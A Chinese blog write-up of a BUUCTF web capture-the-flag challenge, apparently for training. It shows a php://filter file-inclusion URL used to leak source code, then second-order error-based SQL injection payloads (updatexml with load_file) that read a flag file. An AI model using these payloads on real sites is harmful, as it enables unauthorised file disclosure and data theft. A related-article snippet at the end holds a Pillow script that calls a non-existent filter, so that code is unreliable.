BUUCTF Web CyberPunk WriteUp

已于 2023-07-29 21:44:53 修改
阅读量477 收藏
点赞数
分类专栏: CTF 文章标签: web安全 网络安全 sql sql注入 文件包含 ctf
于 2023-07-08 02:04:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/131606906
版权

在这里插入图片描述

想直接查看payload的点这里

前言

二次注入(Second-Order Injection)是指攻击者在应用程序中注入恶意数据,然后在稍后的操作或不同的上下文中再次使用该恶意数据,导致安全漏洞。它通常发生在数据库查询、数据导出、报告生成等过程中。

典型的二次注入示例包括在用户注册时注入恶意代码,然后在管理员操作中触发执行,或者在数据库操作中注入恶意代码。为防止二次注入,应采取综合的安全措施,包括输入验证、参数化查询、代码审计和安全编码实践。

对于SQL注入问题,使用参数化查询或预编译语句,并对用户输入进行严格验证和过滤,可防止恶意SQL代码注入。对于二次注入,还需考虑应用程序的整体逻辑和数据流程,确保数据在后续处理中也得到适当处理和过滤,以防再次执行恶意代码。

正文

查看源码,发现提示,有可能存在文件包含

在这里插入图片描述

还在源码看到存在index.php,change.php,comfirm.php,delete.php,search.php这些文件

可以用php伪协议fenbie依次读取这些文件:

?file=php://filter/convert.base64-encode/resource=index.php

php://filter/convert.base64-encode/resource=index.php 是一个针对 PHP 文件的路径表达式,它使用了 php://filter 伪协议和 convert.base64-encode 过滤器。

它的含义是将目录下的 index.php 文件内容以 Base64 编码的形式读取。

在这里插入图片描述

查看index.php代码可以发现,提交订单的数据要通过confirm.php校验,其中没有校验address地址值。

在这里插入图片描述

再查看change.php代码可以发现,修改订单时只用addslashes函数对address函数进行了转义。

在这里插入图片描述

再看change.php中最关键一行sql语句:

$sql = "update `user` set 
	`address`='".$address."', `old_address`='".$row['address']."
	' where `user_id`=".$row['user_id'];

它把在index.php中提交的旧地址(old_address)重新保存到数据库里。

所以可以在index.php提交订单的时候,在地址里输入sql注入语句,然后在change.php中修改订单时当时的sql注入语句被执行,这就是二次注入。
这里使用报错注入,然后因为updatexml最多一次显示32个字符,所以用两个payload分开读取flag。

payload:
1'and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#

1'and updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,30)),0x7e),1)#

提交订单:

在这里插入图片描述

修改订单成功读取到flag:

在这里插入图片描述

同理再提交订单修改订单获取后半段的flag:
在这里插入图片描述

flag{5cd7240e-e619-4ddf-8bfc-7300b3e1841d}

提交flag

在这里插入图片描述
相关文章:
MySQL 文件读写
探索php://filter在实战当中的奇技淫巧
updatexml mysql_深入浅出带你玩转sqlilabs

CVE-柠檬i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
AndyNoel的博客
05-13 434
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk 看题 看源码有提示?file=? 文件包含漏洞,可以利用这个漏洞读取源码。 分析 index.php?file=php://filter/read=convert.base64-encode/resource=change.php 挨个读取完后,base64解码后,在change.php发现了一点问题 <?php require_once "config.php"; if(!empty($_POST["us
BUUCTF [MRCTF2020]CyberPunk
m0_49025459的博客
04-19 753
题目 下完是个可执行程序 把系统的时间改成2020.9.17就行了,再重新启动一下就行了
BUUCTF [CISCN2019 华北赛区 Day1 Web5] CyberPunk
Senimo
12-16 512
BUUCTF [CISCN2019 华北赛区 Day1 Web5] CyberPunk 考点: 启动环境: 首先进行题目信息收集,在网页源代码中得到提示: <script src="assets/js/retina-1.1.0.js"></script> <script src="assets/js/jquery.unveilEffects.js"></script> </body> </html> <!--?file=?--
BUUCTF misc 专题(95)[MRCTF2020]CyberPunk
tt_npc的博客
05-28 1076
下载附件,发现是个exe文件,运行它 发现运行出来的是当前电脑的系统时间,根据上面提示知道只有在时间是2020.9.17的时候才能运行出flag,那就试着修改电脑系统时间 修改好后重新运行exe 得到flag MRCTF{We1cOm3_70_cyber_security},包上flag flag{We1cOm3_70_cyber_security} ...
BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk
末初的CSDN博客
03-26 2233
F12查看源码,发现存在传参 尝试通过伪协议文件包含读取源码: http://467ceaa4-2e02-46f9-b14a-25ec91a65986.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php 发现除了index.php还存在这几个php文件:confirm.php,delete.ph...
Cyberpunk2077_CYBERPUNK_CheatEngine_
09-29
This is the Cyberpunk Cheat table for the Cheat engine
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
cyberpunk-iterm:Term iTerm的骇客色彩计划
05-10
赛博朋克iTerm :alien_monster: iTerm骇客Colorscheme ... 导入cyberpunk.itermcolors 从颜色预设中选择。 :alien_monster: :raising_hands: 学分 向为VS Code创建原始的。 :balance_scale: 执照 :copyright: 。
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
BugkuCTF-MISC题赛博朋克
am_03的博客
09-05 563
下载文件file.zip,打开发现出错,查看是否为伪加密,以010editor打开搜索504B0102 处起第9,10个字节为0000的为伪加密,若改后仍不能打开为真加密 改为0000后可以打开,解压后得到一个文件cyberpunk.txt,以010editor打开发现文件头为png格式的,即改后缀名为png,为一张图片 考虑图片隐写,用Stegsolve工具看一看吧。最常见的就是LSB隐写,RGB模式。设置完之后往上翻,发现最上面就是flag了。 Stegsolve->Data Extract
BugkuCTF—赛博朋克记录关于ZIP文件文件头协议和LSB隐写
weixin_45871855的博客
01-25 1918
原题 1)打开是一个加密的zip文件,将其拖到txt空白文档发现开头为PK,确实为压缩文件 2)没任何提示情况下我们用010打开,查看是否为伪加密(一般没有任何提示大多数为伪加密,少数情况需要暴力破解) -----------知识分割线-------------- ZIP文件——文件头协议 一个 ZIP 文件由三个部分组成: 压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 压缩源文件数据区: 50 4B 03 04:这是头文件标记(0x04034b50) 14 00:解压文件所需 pkwar
CTF-赛博朋克-bugku解题思路和细节
Mjj567的博客
03-27 927
首先,一个压缩包(东西)到手时立马改后缀为.txt,去看看他到底是什么或者藏着什么线索。PK,发现真的是一个压缩包,那就打开吧,发现还是一个加了密的,之前txt没有发现信息,就拖进010解析一下是否为伪密码。
buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解
AAAAAAAAAAAA66的博客
12-21 2131
这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。 目录 二次注入 二次注入的成因 二次注入常出现的地方 题解 思路 步骤 二次注入 二次注入的成因 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义...
BUUCTF_练[CISCN2019 华北赛区 Day1 Web5]CyberPunk
m0_66225311的博客
10-30 802
`php`伪协议读取文件;源码泄露`hint` ;代码审计 发现二次注入点;SQL语句的二次注入和报错注入结合使用。报错注入进行文件读取操作;`substr`函数配合报错注入输出固定长度和范围的数据
buuctf misc 刷题记录(持续更新)
最新发布
u013107427的博客
11-15 1108
buuctf刷题记录
一天一道ctf 第50天(二次注入)
scrawman的博客
08-09 330
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 查看源代码,可能有文件包含漏洞,直接读取是不行的,要用filter伪协议:?file=php://filter/convert.base64-encode/resource=index.php同样还可以拿到change.php,delete.php,confirm.php的源码。 代码审计,可以发现对SQL注入的参数进行了很严的过滤,但既然是题目肯定会给你造漏洞,就找那些过滤方法不一样的参数就行了。user_name和phone都用
buuctf [SWPU2019]Web1 1
weixin_45642610的博客
03-13 1569
buuctf [SWPU2019]Web1 1 sql 无列名注入 注册登录发布广告 1'测试 存在sql注入 经测试,or,空格,#被过滤 不能用order by测试列数,用group by代替 注释符#用,'3代替,数字随便 (这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?) 空格用/**/代替 1'/**/group/**/by/**/22,'3 1'/**/group/**/by/**/23,'
BUUCTF:[XDCTF 2015]filemanager —php代码审计 + 文件上传 + sql闭合语句注入数据库 + 二次注入
Zero_Adam的博客
04-25 646
0、前置知识点: 1. pathinfo()
用python的pillow写一个程序,将一个城市图片赛博朋克化
05-11
好的,以下是一个简单的Python程序,使用Pillow库将城市图片赛博朋克化: ```python from PIL import Image, ImageFilter, ImageOps # 打开原始图片 original_image = Image.open('city.jpg') # 转换为黑白图片 black_white_image = original_image.convert('L') # 添加噪点 noisy_image = black_white_image.filter(ImageFilter.GaussianBlur(radius=2)) noisy_image = noisy_image.filter(ImageFilter.AddNoise(0.3)) # 反转图片 inverted_image = ImageOps.invert(noisy_image) # 应用赛博朋克效果 cyberpunk_image = inverted_image.filter(ImageFilter.SMOOTH_MORE) cyberpunk_image = cyberpunk_image.filter(ImageFilter.CONTOUR) # 保存处理后的图片 cyberpunk_image.save('cyberpunk_city.jpg') ``` 这个程序将原始城市图片转换为黑白,添加噪点,反转颜色,最后应用赛博朋克效果。最终的赛博朋克化图片将保存为 `cyberpunk_city.jpg` 文件。你可以根据自己的需要调整处理效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值